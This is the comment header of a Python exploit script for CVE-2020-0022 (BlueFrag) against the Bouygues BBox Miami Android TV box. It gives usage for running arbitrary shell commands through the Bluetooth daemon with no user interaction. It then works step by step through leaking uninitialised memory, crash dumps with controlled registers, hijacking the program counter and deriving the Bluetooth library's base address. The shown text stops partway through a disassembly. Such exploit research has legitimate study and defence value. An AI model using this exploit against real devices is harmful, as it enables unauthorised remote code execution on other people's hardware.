bbox_exploit.py

# coding: utf-8
##############################################################################################################################################################################
#
# CVE-2020-0022 vulnerability exploitation on Bouygues BBox Miami (Android TV 8.0 - ARM32 Cortex A9)
# By Polo35 - 2020/08/24
#
##############################################################################################################################################################################
#
# "Usage: python polo_exploit.py target_bt_mac [target_adb_ip, shell_command, disable_reboot, verbose]"
#
##############################################################################################################################################################################
#
# Based on scripts by Jan Ruge
# CVE-2020-0022 an Android 8.0-9.0 Bluetooth Zero-Click RCE – BlueFrag
# https://insinuator.net/2020/04/cve-2020-0022-an-android-8-0-9-0-bluetooth-zero-click-rce-bluefrag/
#
##############################################################################################################################################################################
#
# INTRODUCTION & TIPS
#
##############################################################################################################################################################################
#
# The script use python bluetooth module to get ACL connection handle
# So you need to install bluetooth libraries and pybluez (version 0.22 for python2 and last version for python3)
#
# sudo apt-get update
# sudo apt-get install bluetooth bluez libbluetooth-dev
# sudo pip install pybluez
#
# You can pass a shell command to the script as parameter that will be executed with system function with permissions of the bluetooth deamon
# There is only 104 characters available for the shell command because the ROP chain take 20 first bytes of the second payload
# 
# Exemple:
# shell_command = "cat /dev/zero | echo 'Target Exploited' > /sdcard/Download/cve-2020-0022-poc"
#
# The script can use adb to check connection inspect logcat and reboot the target when needed
# For this you have to pass the target ip as parameter
# Make sure to connect target with adb connect and open a shell to check connection before using the script
#
# Best results are obtained by connecting the target via bluetooth with a smartphone when the script say it ;)
# It can take more than 30 try to trigger the exploit but it sometime work at first try
#
#
##############################################################################################################################################################################
#
# MEMORY LEAK WITH ARM32
#
##############################################################################################################################################################################
#
# The Bouygues BBox Miami is based on an ARM 32 bytes Cortex A9 processor
# The difference with ARM64 is that libc memcpy function doesn't underflow so it's impossible to get same leaks as Jan Ruge
# But the vulnerability is present and is exploitable in a different way
#
#
# By sending l2cap packet with 4 bytes fragmentation we can trigger a memcpy of 0 length in reassemble_and_dispatch
# This allow to get 4 bytes of uninitialized data at end of echo
#
# Increasing first packet length (further named mem_offset) allow to "walk" the uninitialized memory
# Getting 32 echos with same mem_offset give 2 to 8 exploitable echos
# Echos are repeated so no need to get more then 32 echos at same mem_offset
# This method we also feel memory with the packets so it's easy to reconize patterns and find offsets in leaks
#
# The mem_offset is the length of the l2cap packet in characters
# Ex: mem_offset 184 = l2cap packet of 184 characters = l2cap packet of 368 bytes
#
# Example of memory "walking" and uninitialized data with repetitions:
#
# 176: 00000000 01000000 01000000 00000000 00000000 01000000 00000000 00000000 00000000 01000000 01000000 00000000 00000000 01000000 00000000 00000000 ................................................................
# 177: 00000000 000000a4 00000024 00000000 00000000 000000a4 00000000 00000000 00000000 000000a4 00000024 00000000 00000000 000000a4 00000000 00000000 ...........$...............................$....................
# 178: 00000000 0000a4ce 000024d2 00000000 00000000 0000a4d5 00000000 00000000 00000000 0000a4ce 000024d2 00000000 00000000 0000a4d5 00000000 00000000 ..........$...............................$.....................
# 179: 00000000 00a4ce80 0024d280 00000000 00000000 00a4d580 00000000 00000000 00000000 00a4ce80 0024d280 00000000 00000000 00a4d580 00000000 00000000 .........$...............................$......................
# 180: 00000000 a4ce80a3 24d280a3 00000000 00000000 a4d580a3 00000000 00000000 00000000 a4ce80a3 24d280a3 00000000 00000000 a4d580a3 00000000 00000000 ........$...............................$.......................
# 181: 00000000 ce80a39c d280a31c 00000000 00000000 d580a39c 00000000 00000000 00000000 ce80a39c d280a31c 00000000 00000000 d580a39c 00000000 00000000 ................................................................
# 182: 00000000 80a39cce 80a31cd2 00000000 00000000 80a39cd5 00000000 00000000 00000000 80a39cce 80a31cd2 00000000 00000000 80a39cd5 00000000 00000000 ................................................................
# 183: 00000000 a39cce80 a31cd280 00000000 00000000 a39cd580 00000000 00000000 00000000 a39cce80 a31cd280 00000000 00000000 a39cd580 00000000 00000000 ................................................................
# 184: 00000000 9cce80a3 1cd280a3 00000000 00000000 9cd580a3 00000000 00000000 00000000 9cce80a3 1cd280a3 00000000 00000000 9cd580a3 00000000 00000000 ................................................................
# 185: 00000000 ce80a300 d280a300 00000000 00000000 d580a300 00000000 00000000 00000000 ce80a300 d280a300 00000000 00000000 d580a300 00000000 00000000 ................................................................
# 186: 00000000 80a30000 80a30000 00000000 00000000 80a30000 00000000 00000000 00000000 80a30000 80a30000 00000000 00000000 80a30000 00000000 00000000 ................................................................
# 187: 00000000 a3000000 a3000000 00000000 00000000 a3000000 00000000 00000000 00000000 a3000000 a3000000 00000000 00000000 a3000000 00000000 00000000 ................................................................
# 188: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 ................................................................
#
# We can see at mem_offset 180 and 184 some memory address in little endian
#
# a4ce80a3 give address 0xa380cea4
# 24d280a3 give address 0xa380d224
# a4d580a3 give address 0xa380d5a4
# 9cce80a3 give address 0xa380ce9c
# 1cd280a3 give address 0xa380d21c
# 9cd580a3 give address 0xa380d59c
#
# There is at least 4 or 5 mem_offset where is possible to find real memory address after nearly all reboot
# We will see later how we can use them
#
##############################################################################################################################################################################
#
# ANALYSE OF FIRST CRASH
#
##############################################################################################################################################################################
#
# By sending l2cap packet with 2 bytes fragmentation we can trigger a memcpy of -2 length in reassemble_and_dispatch
# This allow to overflow outside the partial packet with 30 bytes of controlled data from the second packet
# Because of the 30 copied bytes it's not necessary to send packets bigger than 32 bytes with 4 last bytes null
#
# This overflow method sometimes crash the bluetooth deamon with controlled R0 register in _Z11list_appendP6list_tPv+65:
#
# HCI: Found link transmit data buffer queue at 0xab90dbc4
# HCI: Found SetDataAdvDataSender function at 0x91875b29
# HCI: Found bte_hh_evt function at 0x91818429
# HCI: Found bluetooth library base address at 0x917a0000
# First payload:
#   0x00: 0xdead0000 | 0x04: 0xdead0001 | 0x08: 0xdead0002 | 0x0c: 0xdead0003
#   0x10: 0xdead0004 | 0x14: 0xdead0005 | 0x18: 0xdead0006 | 0x1c: 0xdead0007
# Second payload:
#   0x00 : 0xab90db14: 0xdead0008 | 0xab90db18: 0xdead0009 | 0xab90db1c: 0xdead000a | 0xab90db20: 0xdead000b
#   0x10 : 0xab90db24: 0xdead000c | 0xab90db28: 0xdead000d | 0xab90db2c: 0xdead000e | 0xab90db30: 0xdead000f
#   0x20 : 0xab90db34: 0xdead0010 | 0xab90db38: 0xdead0011 | 0xab90db3c: 0xdead0012 | 0xab90db40: 0xdead0013
#   0x30 : 0xab90db44: 0xdead0014 | 0xab90db48: 0xdead0015 | 0xab90db4c: 0xdead0016 | 0xab90db50: 0xdead0017
#   0x40 : 0xab90db54: 0xdead0018 | 0xab90db58: 0xdead0019 | 0xab90db5c: 0xdead001a | 0xab90db60: 0xdead001b
#   0x50 : 0xab90db64: 0xdead001c | 0xab90db68: 0xdead001d | 0xab90db6c: 0xdead001e | 0xab90db70: 0xdead001f
#   0x60 : 0xab90db74: 0xdead0020 | 0xab90db78: 0xdead0021 | 0xab90db7c: 0xdead0022 | 0xab90db80: 0xdead0023
#   0x70 : 0xab90db84: 0xdead0024 | 0xab90db88: 0xdead0025 | 0xab90db8c: 0xdead0026 | 0xab90db90: 0xdead0027
#   0x80 : 0xab90db94: 0xdead0028 | 0xab90db98: 0xdead0029 | 0xab90db9c: 0xdead002a | 0xab90dba0: 0xdead002b
#   0x90 : 0xab90dba4: 0xdead002c | 0xab90dba8: 0xdead002d | 0xab90dbac: 0xdead002e | 0xab90dbb0: 0xdead002f
#   0xa0 : 0xab90dbb4: 0xdead0030 | 0xab90dbb8: 0xdead0031 | 0xab90dbbc: 0xdead0032 | 0xab90dbc0: 0xdead0033
#   0xb0 : 0xab90dbc4: 0xdead0034 | 0xab90dbc8: 0xdead0035
# ADB: Found interesting crash !!!
# libc    : Fatal signal 11 (SIGSEGV), code 1, fault addr 0xdead0003 in tid 3918 (bt_workqueue)
# DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
# DEBUG   : Build fingerprint: 'BouyguesTelecom/BouygtelTV/HMB4213H:8.0.0/CALIFORNIE/6.30.13:user/release-keys'
# DEBUG   : Revision: '0'
# DEBUG   : ABI: 'arm'
# DEBUG   : pid: 3871, tid: 3918, name: bt_workqueue  >>> com.android.bluetooth <<<
# DEBUG   : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xdead0003
# DEBUG   :     r0 dead0003  r1 90d13e00  r2 90d13e00  r3 00000000
# DEBUG   :     r4 ab9059f8  r5 90d13e00  r6 00000000  r7 00000000
# DEBUG   :     r8 00000000  r9 904df340  sl 904df338  fp 00000001
# DEBUG   :     ip acf310ec  sp 904defd8  lr 918a3131  pc 918c98e2  cpsr a00f0030
# DEBUG   : 
# DEBUG   : backtrace:
# DEBUG   :     #00 pc 001298e2  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z11list_appendP6list_tPv+65)
# DEBUG   :     #01 pc 0010312d  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z24l2c_link_check_send_pktsP12t_l2c_linkcbP9t_l2c_ccbP6BT_HDR+36)
# DEBUG   :     #02 pc 0010298f  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z22l2c_link_hci_conn_comphtPh+78)
# DEBUG   :     #03 pc 000e5371  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z22btu_hcif_process_eventhP6BT_HDR+440)
# DEBUG   :     #04 pc 000e6607  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z17btu_hci_msg_readyP13fixed_queue_tPv+42)
# DEBUG   :     #05 pc 001290df  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_ZL22internal_dequeue_readyPv+46)
# DEBUG   :     #06 pc 0012b535  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_ZL11run_reactorP9reactor_ti+216)
# DEBUG   :     #07 pc 0012b431  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z13reactor_startP9reactor_t+44)
# DEBUG   :     #08 pc 0012c729  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_ZL10run_threadPv+136)
# DEBUG   :     #09 pc 00047f17  /system/lib/libc.so (_ZL15__pthread_startPv+22)
# DEBUG   :     #10 pc 0001b1dd  /system/lib/libc.so (__start_thread+32)
#
# The disassembly at 001298e2 give:
#
# .text:0x1298E0 loc_1298E0                              ; CODE XREF: list_append:loc_1298CA↑j
# .text:0x1298E0                 LDR             R0, [R4,#0x10]                                       => Load R0 from R4+0x10
# .text:0x1298E2                 LDR             R1, [R0]                                             => Load R1 from R0                     => Crash if not controlled !!!
# .text:0x1298E4                 MOVS            R0, #8                                               => Set 8 in R0
# .text:0x1298E6                 BLX             R1                                                   => Branch with Link and exchange to R1 => Branch to controlled R1
#
# The decompilation show that we overwrite the memory at address of R4+0x10 which is allocator in the call "node = list->allocator->alloc(8)":
#
# signed int list_append(list_t *list_ptr, void *data_ptr)
# {
#   list_t *list = list_ptr; // r4
#   ...
#   list_node_t *node = (list_node_t*)list->allocator->alloc(sizeof(list_node_t));                <= list = r4 / allocator = offset 0x10 / alloc = r1 / 8 = r0 / CRASH !!!
#   ...
#  node->data = data_ptr; // r5
# ...
# }
#
# The deamon crashed on LDR R1, [R0] with R0 register = dead0003 when trying to load the address
# We can control R0 with first payload + 0xC so if we place a valid address in it we can control R1 with the LDR R1, [R0] and than control PC with BLX R1 
#
##############################################################################################################################################################################
#
# CONTROL PROGRAM COUNTER BY OVERFLOWING LEAKED ADDRESS
#
##############################################################################################################################################################################
#
# Using the overflow method with the first memory address found at mem_offset 180 allow to move the crash to a branch to controlled R1 register
#
# HCI: Got ACL connection handle: 0xb                                                                                                                             
# HCI: Getting link transmit data buffer queue pointer...
# HCI: Found link transmit data buffer queue at 0xa458dbc4
# HCI: Getting bluetooth library function pointers...
# HCI: Found SetDataAdvDataSender function at 0x8a4a3b29
# HCI: Found bluetooth library base address at 0x8a3ce000
# Building the payloads...
# First payload:
#   0x00: 0xdead0000 | 0x04: 0xdead0001 | 0x08: 0xdead0002 | 0x0c: 0xa458dbc4
#   0x10: 0xdead0003 | 0x14: 0xdead0004 | 0x18: 0xdead0005 | 0x1c: 0xdead0006
# Second payload:
#   0x00 : 0xa458dbc4: 0xdead0007 | 0xa458dbc8: 0xdead0008 | 0xa458dbcc: 0xdead0009 | 0xa458dbd0: 0xdead000a
#   0x10 : 0xa458dbd4: 0xdead000b | 0xa458dbd8: 0xdead000c | 0xa458dbdc: 0xdead000d | 0xa458dbe0: 0xdead000e
#   0x20 : 0xa458dbe4: 0xdead000f | 0xa458dbe8: 0xdead0010 | 0xa458dbec: 0xdead0011 | 0xa458dbf0: 0xdead0012
#   0x30 : 0xa458dbf4: 0xdead0013 | 0xa458dbf8: 0xdead0014 | 0xa458dbfc: 0xdead0015 | 0xa458dc00: 0xdead0016
#   0x40 : 0xa458dc04: 0xdead0017 | 0xa458dc08: 0xdead0018 | 0xa458dc0c: 0xdead0019 | 0xa458dc10: 0xdead001a
#   0x50 : 0xa458dc14: 0xdead001b | 0xa458dc18: 0xdead001c | 0xa458dc1c: 0xdead001d | 0xa458dc20: 0xdead001e
#   0x60 : 0xa458dc24: 0xdead001f | 0xa458dc28: 0xdead0020 | 0xa458dc2c: 0xdead0021 | 0xa458dc30: 0xdead0022
#   0x70 : 0xa458dc34: 0xdead0023 | 0xa458dc38: 0xdead0024 | 0xa458dc3c: 0xdead0025 | 0xa458dc40: 0xdead0026
#   0x80 : 0xa458dc44: 0xdead0027 | 0xa458dc48: 0xdead0028 | 0xa458dc4c: 0xdead0029 | 0xa458dc50: 0xdead002a
#   0x90 : 0xa458dc54: 0xdead002b | 0xa458dc58: 0xdead002c | 0xa458dc5c: 0xdead002d | 0xa458dc60: 0xdead002e
#   0xa0 : 0xa458dc64: 0xdead002f | 0xa458dc68: 0xdead0030 | 0xa458dc6c: 0xdead0031 | 0xa458dc70: 0xdead0032
#   0xb0 : 0xa458dc74: 0xdead0033 | 0xa458dc78: 0xdead0034
# Prepare to connect to the target via bluetooth with your smartphone
# HCI: Spraying second payload at 0xa458dbc4
# Connect to the target via bluetooth with your smartphone                                                                                                        
# HCI: Triggering the exploit with first payload... (1/3)
# ADB: Bluetooth deamon crashed (3/20)                                                                                                                            
# ADB: Found interesting crash !!!
# 07-20 09:28:01.020 20972 21006 F libc    : Fatal signal 11 (SIGSEGV), code 1, fault addr 0xdead0032 in tid 21006 (bt_workqueue)
# 07-20 09:28:01.123 21061 21061 F DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
# 07-20 09:28:01.123 21061 21061 F DEBUG   : Build fingerprint: 'BouyguesTelecom/BouygtelTV/HMB4213H:8.0.0/CALIFORNIE/6.30.13:user/release-keys'
# 07-20 09:28:01.123 21061 21061 F DEBUG   : Revision: '0'
# 07-20 09:28:01.123 21061 21061 F DEBUG   : ABI: 'arm'
# 07-20 09:28:01.123 21061 21061 F DEBUG   : pid: 20972, tid: 21006, name: bt_workqueue  >>> com.android.bluetooth <<<
# 07-20 09:28:01.123 21061 21061 F DEBUG   : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xdead0032
# 07-20 09:28:01.123 21061 21061 F DEBUG   :     r0 00000008  r1 dead0033  r2 8970a200  r3 00000000
# 07-20 09:28:01.123 21061 21061 F DEBUG   :     r4 a4585c38  r5 8970a200  r6 00000000  r7 00000000
# 07-20 09:28:01.123 21061 21061 F DEBUG   :     r8 00000000  r9 891fd340  sl 891fd338  fp 00000001
# 07-20 09:28:01.124 21061 21061 F DEBUG   :     ip a66aa0ec  sp 891fcfd8  lr 8a4f78e9  pc dead0032  cpsr 200f0030
# 07-20 09:28:01.228 21061 21061 F DEBUG   : 
# 07-20 09:28:01.228 21061 21061 F DEBUG   : backtrace:
# 07-20 09:28:01.228 21061 21061 F DEBUG   :     #00 pc dead0032  <unknown>
# 07-20 09:28:01.229 21061 21061 F DEBUG   :     #01 pc 001298e7  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z11list_appendP6list_tPv+70)
# 07-20 09:28:01.229 21061 21061 F DEBUG   :     #02 pc 0010312d  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z24l2c_link_check_send_pktsP12t_l2c_linkcbP9t_l2c_ccbP6BT_HDR+36)
# 07-20 09:28:01.229 21061 21061 F DEBUG   :     #03 pc 0010298f  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z22l2c_link_hci_conn_comphtPh+78)
# 07-20 09:28:01.229 21061 21061 F DEBUG   :     #04 pc 000e5371  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z22btu_hcif_process_eventhP6BT_HDR+440)
# 07-20 09:28:01.229 21061 21061 F DEBUG   :     #05 pc 000e6607  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z17btu_hci_msg_readyP13fixed_queue_tPv+42)
# 07-20 09:28:01.229 21061 21061 F DEBUG   :     #06 pc 001290df  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_ZL22internal_dequeue_readyPv+46)
# 07-20 09:28:01.229 21061 21061 F DEBUG   :     #07 pc 0012b535  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_ZL11run_reactorP9reactor_ti+216)
# 07-20 09:28:01.229 21061 21061 F DEBUG   :     #08 pc 0012b431  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z13reactor_startP9reactor_t+44)
# 07-20 09:28:01.229 21061 21061 F DEBUG   :     #09 pc 0012c729  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_ZL10run_threadPv+136)
# 07-20 09:28:01.229 21061 21061 F DEBUG   :     #10 pc 00047f17  /system/lib/libc.so (_ZL15__pthread_startPv+22)
# 07-20 09:28:01.229 21061 21061 F DEBUG   :     #11 pc 0001b1dd  /system/lib/libc.so (__start_thread+32)
#
# The same disassembly at 001298e7 give:
#
# .text:0x1298E0 loc_1298E0                              ; CODE XREF: list_append:loc_1298CA↑j
# .text:0x1298E0                 LDR             R0, [R4,#0x10]                                       => Load R0 from R4+0x10
# .text:0x1298E2                 LDR             R1, [R0]                                             => Load R1 from R0                     => Crash if not controlled
# .text:0x1298E4                 MOVS            R0, #8                                               => Set 8 in R0
# .text:0x1298E6                 BLX             R1                                                   => Branch with link and exchange to R1 => Branch to controlled R1 !!!
# .text:0x1298E8                 MOV             R1, R0
#
# The deamon now crashed on BLX R1 with R1 register = dead0033
# This is the pattern sent in fragmented packets when getting leaks at mem_offset 184
# This will be the second payload with a known address at an offset of - 0xb0 from first memory address found at mem_offset 180
#
# We can now control PC of bluetooth.marvellberlin.so library have a second place in memory with the data and we know the address of this one
#
# After the signal the registers contains:
# - R0 = 0x8
# - R1 = second payload value + 0xb0
# - R4 = first payload address - 0x4
#
##############################################################################################################################################################################
#
# GET THE BLUETOOTH LIBRARY BASE ADDRESS
#
##############################################################################################################################################################################
#
# Using the leak method at mem_offset 28 we are able to find some memory address:
# 
# 0026 : 00002954 74007400 74006600 58a9292b 74006600 74007400 72002e00 58a9292b 00002954 70007000 74007400 58a9292b 74006600 74007400 74006600 58a9292b : ..)Tt.t.t.f.X.)+t.f.t.t.r...X.)+..)Tp.p.t.t.X.)+t.f.t.t.t.f.X.)+
# 0027 : 0029546c 00740066 002e0074 a9292b72 00660000 00700066 00740066 a9292b72 0029546c 00740066 00660066 a9292b72 00660000 00740066 002e0074 a9292b72 : .)Tl.t.f...t.)+r.f...p.f.t.f.)+r.)Tl.t.f.f.f.)+r.f...t.f...t.)+r
# 0028 : 29546c8f 70006600 74006600 292b728f 66000000 74006600 66006600 292b728f 29546c8f 74006600 2e007400 292b728f 66000000 70006600 74006600 292b728f : )Tl.p.f.t.f.)+r.f...t.f.f.f.)+r.)Tl.t.f...t.)+r.f...p.f.t.f.)+r.
# 0029 : 00660066 00660000 2b728f01 00000000 00660000 00740074 2b728f01 00660066 00660000 00660066 2b728f01 00000000 00660000 00660000 2b728f01 00740074 : .f.f.f..+r.......f...t.t+r...f.f.f...f.f+r.......f...f..+r...t.t
# 0030 : 66006600 66000000 728f0100 00000000 66000000 66006600 728f0100 74007400 66006600 66000000 728f0100 00000000 66000000 66000000 728f0100 74007400 : f.f.f...r.......f...f.f.r...t.t.f.f.f...r.......f...f...r...t.t.
#
# We can see leaks 29546c8f and 292b728f which give address 0x8f6c5429 and 0x8f722b29 in little endian
#
# Using the overflow method with those address crash the deamon in bluetooth.marvellberlin.so with the following crash dump:
#
# libc    : Fatal signal 11 (SIGSEGV), code 1, fault addr 0x10 in tid 4151 (bt_workqueue)
# DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
# DEBUG   : Build fingerprint: 'BouyguesTelecom/BouygtelTV/HMB4213H:8.0.0/CALIFORNIE/6.30.13:user/release-keys'
# DEBUG   : Revision: '0'
# DEBUG   : ABI: 'arm'
# DEBUG   : pid: 4107, tid: 4151, name: bt_workqueue  >>> com.android.bluetooth <<<
# DEBUG   : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x10
# DEBUG   : Cause: null pointer dereference
# DEBUG   :     r0 00000008  r1 8c35db29  r2 8b006300  r3 00000020
# DEBUG   :     r4 a6405578  r5 8b006300  r6 00000020  r7 ff183456
# DEBUG   :     r8 a6405560  r9 00000006  sl 00000002  fp 8affef70
# DEBUG   :     ip 00001e7e  sp 8affef60  lr 8c3b18e9  pc 8c35db3c  cpsr 200f0030
# DEBUG   : 
# DEBUG   : backtrace:
# DEBUG   :     #00 pc 000d5b3c  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_ZN4base8internal7InvokerINS0_9BindStateIMN12_GLOBAL__N_125BleAdvertisingManagerImplEFvhhhhPhNS_8CallbackIFvhELNS0_8CopyModeE1EEEEJNS0_17UnretainedWrapperIS4_EEbEEEFvhhhS5_S9_EE3RunEPNS0_13BindStateBaseEOhSJ_SJ_OS5_OS9_+19)
# DEBUG   :     #01 pc 001298e7  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z11list_appendP6list_tPv+70)
# DEBUG   :     #02 pc 0010312d  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z24l2c_link_check_send_pktsP12t_l2c_linkcbP9t_l2c_ccbP6BT_HDR+36)
# DEBUG   :     #03 pc 0010477f  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z16l2c_rcv_acl_dataP6BT_HDR+2190)
# DEBUG   :     #04 pc 001290df  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_ZL22internal_dequeue_readyPv+46)
# DEBUG   :     #05 pc 0012b535  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_ZL11run_reactorP9reactor_ti+216)
# DEBUG   :     #06 pc 0012b431  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z13reactor_startP9reactor_t+44)
# DEBUG   :     #07 pc 0012c729  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_ZL10run_threadPv+136)
# DEBUG   :     #08 pc 00047f17  /system/lib/libc.so (_ZL15__pthread_startPv+22)
# DEBUG   :     #09 pc 0001b1dd  /system/lib/libc.so (__start_thread+32)
#
# We land in .text section of bluetooth.marvellberlin.so library at offset 000d5b3c
#
# .text:0x0D5B28 SetDataAdvDataSender                  ; DATA XREF: .text:0x0D2B82↑o
# .text:0x0D5B28
# .text:0x0D5B28                 PUSH.W          {R4-R11,LR}
# .text:0x0D5B2C                 SUB             SP, SP, #0x1C
# .text:0x0D5B2E                 LDR             R7, =(off_1A2718 - 0xD5B38)
# .text:0x0D5B30                 ADD.W           R11, SP, #0x10
# .text:0x0D5B34                 ADD             R7, PC  ; off_1A2718
# .text:0x0D5B36                 LDR             R7, [R7]
# .text:0x0D5B38                 LDR             R7, [R7]
# .text:0x0D5B3A                 STR             R7, [SP,#0x1C-4]
# .text:0x0D5B3C                 LDRD.W          R10, R7, [R0,#8]
#
# The crash is at 0xd5b3c just after the start of a function so the found address is a pointer to this function
# This fonction is SetDataAdvDataSender of the class BleAdvertisingManagerImpl used as a pointer in SetData function of btm_ble_multi_adv.cc file
#
#  void SetData(uint8_t inst_id, bool is_scan_rsp, std::vector<uint8_t> data, MultiAdvCb cb) override {
# ...
#    DivideAndSendData(inst_id, data, cb, base::Bind(&BleAdvertisingManagerImpl::SetDataAdvDataSender, base::Unretained(this), is_scan_rsp));
#  }
#
# We now have the address of a fixed location in bluetooth.marvellberlin.so library and can compute the base address of this library
# The real offset to library base address is 0XD5B29 from the pointer to SetDataAdvDataSender function found at mem_offset 28
#
# In the example above we found SetDataAdvDataSender function at 0X8C35DB29 and overflowed this address
# The bluetooth library base address was 0X8C35DB29 - 0XD5B29 = 0X8C288000
#
# We also found a pointer to 0x8C300429 in the same leak at mem_offset 28
# The offset between the 2 found addresses is 0x8C35DB29 - 0x8C300429 = 0x5D700
# We know that SetDataAdvDataSender is at 0xD5B28 in the bluetooth library so we can compute the address of the second found pointer: 0xD5B28 - 0x5D700 = 0x78428
# At 0x78428 in the bluetooth library we have the function bte_hh_evt which is use in btif_hh_service_registration and btif_hh_execute_service functions of btif_hh.cc file
#
#void btif_hh_service_registration(bool enable) {
#  ...
#    BTA_HhEnable(BTA_SEC_ENCRYPT, bte_hh_evt);
#  ...
#}
#
# bt_status_t btif_hh_execute_service(bool b_enable) {
#  ...
#     BTA_HhEnable(BTUI_HH_SECURITY, bte_hh_evt);
#  ...
# }
#
# The 2 found address at mem_offset 28 always ends with 0xB29 for SetDataAdvDataSender function and 0x429 for bte_hh_evt function
# With this method we only need one of the 2 known address in the leak to find the bluetooth base address
#
# To summarize we can find bluetooth library base address with:
# - Found SetDataAdvDataSender function address which ends with 0xB29 => Apply an offset of 0xD5B28
# - Found bte_hh_evt function address which ends with 0x429 and applying => Apply an offset of 0x78429
#
##############################################################################################################################################################################
#
# ANALYSE OF CRASH WITH ANDROID SOURCE CODE
#
##############################################################################################################################################################################
#
# The source code of android oreo 8.1 show that we overwrite a part of the link transmit data buffer queue object p_lcb->link_xmit_data_q
#
# l2c_rcv_acl_data function create the tL2C_LCB* p_lcb object and pass it to l2c_link_check_send_pkts function which append the packet to link_xmit_data_q buffer queue
#
# void l2c_rcv_acl_data(BT_HDR* p_msg) {
# ...
#   tL2C_LCB* p_lcb;
# ...
#    /* Find the LCB based on the handle */
#    p_lcb = l2cu_find_lcb_by_handle(handle);
# ...
#  /* Send the data through the channel state machine */
#  if (rcv_cid == L2CAP_SIGNALLING_CID) {
#    process_l2cap_cmd(p_lcb, p, l2cap_len);
# ...
# }
#
# tL2C_LCB* l2cu_find_lcb_by_handle(uint16_t handle) {
# ...
#   tL2C_LCB* p_lcb = &l2cb.lcb_pool[0];
# 
#   for (xx = 0; xx < MAX_L2CAP_LINKS; xx++, p_lcb++) {
#     if ((p_lcb->in_use) && (p_lcb->handle == handle)) {
#       return (p_lcb);
#     }
#   }
# ...
# }
#
# p_lcb is taken from the static l2cb.lcb_pool[0] object as define in l2c_main.cc
#
# /******************************************************************************/
# /*               G L O B A L      L 2 C A P       D A T A                     */
# /******************************************************************************/
# tL2C_CB l2cb;
#
# static void process_l2cap_cmd(tL2C_LCB* p_lcb, uint8_t* p, uint16_t pkt_len) {
# ...
#      case L2CAP_CMD_ECHO_REQ:
#        l2cu_send_peer_echo_rsp(p_lcb, id, p, cmd_len);
# ...
# }
#
# void l2cu_send_peer_echo_rsp(tL2C_LCB* p_lcb, uint8_t id, uint8_t* p_data, uint16_t data_len) {
# ...
#  p_buf = l2cu_build_header(p_lcb, (uint16_t)(L2CAP_ECHO_RSP_LEN + data_len), L2CAP_CMD_ECHO_RSP, id);
# ...
#   l2c_link_check_send_pkts(p_lcb, NULL, p_buf);
# }
# 
#
# void l2c_link_check_send_pkts(tL2C_LCB* p_lcb, tL2C_CCB* p_ccb, BT_HDR* p_buf) {
# ...
#     list_append(p_lcb->link_xmit_data_q, p_buf);
# ...
# }
#
# bool list_append(list_t* list, void* data) {
# ...
#   list_node_t* node = (list_node_t*)list->allocator->alloc(sizeof(list_node_t));     => Call to alloc replaced by our call (Only one parameter !!!)
# ...
# }
#
# The definition of link_xmit_data_q in tL2C_LCB structure is:
#
# /* Define a link control block. There is one link control block between
#  * this device and any other device (i.e. BD ADDR).
# */
# typedef struct t_l2c_linkcb {
# ...
# list_t* link_xmit_data_q;    /* Link transmit data buffer queue */  | Size 0x4 | Offset 0x44 
# ...
# } tL2C_LCB;
#
# The definition of list_t structure is:
#
# typedef struct list_t {
#   list_node_t* head;                                                | Size 0x4 | Offset 0x0
#   list_node_t* tail;                                                | Size 0x4 | Offset 0x4
#   size_t length;                                                    | Size 0x4 | Offset 0x8
#   list_free_cb free_cb;                                             | Size 0x4 | Offset 0xC
#   const allocator_t* allocator;                                     | Size 0x4 | Offset 0x10
# } list_t;                                                           | Size 0x14                                                        
#
# With list_node_t structure:                                         
#                                                                     
# struct list_node_t {                                                
#   struct list_node_t* next;                                         | Size 0x4 | Offset 0x0
#   void* data;                                                       | Size 0x4 | Offset 0x4
# };                                                                  | Size 0x8                                                                  
#                                                                     
# And allocator_t structure:                                          
#                                                                     
# typedef struct {                                                    
#   alloc_fn alloc;                                                   | Size 0x4 | Offset 0x0
#   free_fn free;                                                     | Size 0x4 | Offset 0x4
# } allocator_t;                                                      | Size 0x8                                                   
#                                                                     
# typedef struct {                                                    
#  uint16_t event;                                                    | Size 0x2 | Offset 0x0
#  uint16_t len;                                                      | Size 0x2 | Offset 0x2
#  uint16_t offset;                                                   | Size 0x2 | Offset 0x4
#  uint16_t layer_specific;                                           | Size 0x2 | Offset 0x6
#  uint8_t data[];                                                    | Size 0xx | Offset 0x8
#} BT_HDR;                                                            | Size 0x8 + data length
#
#
# The disassembly of l2c_link_check_send_pkts function:
#
# .text:0x00103108                 PUSH.W          {R4-R11,LR}
# .text:0x0010310C                 SUB             SP, SP, #0x14
